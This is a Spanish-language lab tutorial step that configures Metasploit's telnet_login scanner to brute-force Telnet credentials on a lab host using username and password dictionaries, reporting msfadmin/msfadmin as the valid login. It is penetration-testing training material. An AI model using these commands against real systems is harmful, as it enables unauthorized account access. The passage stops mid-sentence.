En este paso, configuraremos el módulo de Metasploit con el host objetivo, el diccionario de nombres de usuario y el diccionario de contraseñas.
En primer lugar, si no está en la consola de Metasploit, debe iniciar la consola de Metasploit:
cd ~
msfconsole
Utilice el módulo auxiliary/scanner/telnet/telnet_login:
use auxiliary/scanner/telnet/telnet_login
Establezca el host objetivo:
set RHOSTS 192.168.122.102
Establezca el archivo del diccionario de nombres de usuario:
set USER_FILE /username.txt
Establezca el archivo del diccionario de contraseñas:
set PASS_FILE /password.txt
Por último, ejecute el exploit:
exploit
Metasploit comenzará a probar diferentes combinaciones de nombres de usuario y contraseñas de los diccionarios proporcionados. Si se encuentra una credencial válida, se mostrará en verde.
En este caso, la credencial válida es msfadmin/msfadmin.
Presione Ctrl+D para salir de la consola de Metasploit y luego inicie la inspección